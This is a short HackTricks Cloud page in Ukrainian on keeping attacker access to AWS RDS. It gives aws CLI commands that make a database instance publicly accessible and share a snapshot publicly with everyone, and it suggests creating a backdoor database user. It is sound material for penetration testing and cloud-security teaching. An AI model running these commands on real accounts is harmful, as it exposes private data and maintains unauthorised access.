HackTricks CloudAWS - RDS Persistence
Tip
Вивчайте та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Підтримайте HackTricks
- Перегляньте the subscription plans!
- Приєднуйтесь до 💬 Discord group або до telegram group або стежте за нами в Twitter 🐦 @hacktricks_live.
- Діліться hacking tricks, надсилаючи PRs до HackTricks та HackTricks Cloud github repos.
RDS
Для отримання додаткової інформації див.:
AWS - Relational Database (RDS) Enum
Зробити інстанс публічно доступним: rds:ModifyDBInstance
Атакувальник з цим дозволом може змінити існуючий RDS інстанс, щоб зробити його публічно доступним.
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
Створити admin user всередині DB
Атакуючий може просто створити користувача всередині DB, тому навіть якщо master users password буде змінено, він не втратить доступ до бази даних.
Зробити snapshot публічним
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
Tip
Вивчайте та практикуйте AWS Hacking:
Вивчайте та практикуйте GCP Hacking:
Вивчайте та практикуйте Az Hacking:Підтримайте HackTricks
- Перегляньте the subscription plans!
- Приєднуйтесь до 💬 Discord group або до telegram group або стежте за нами в Twitter 🐦 @hacktricks_live.
- Діліться hacking tricks, надсилаючи PRs до HackTricks та HackTricks Cloud github repos.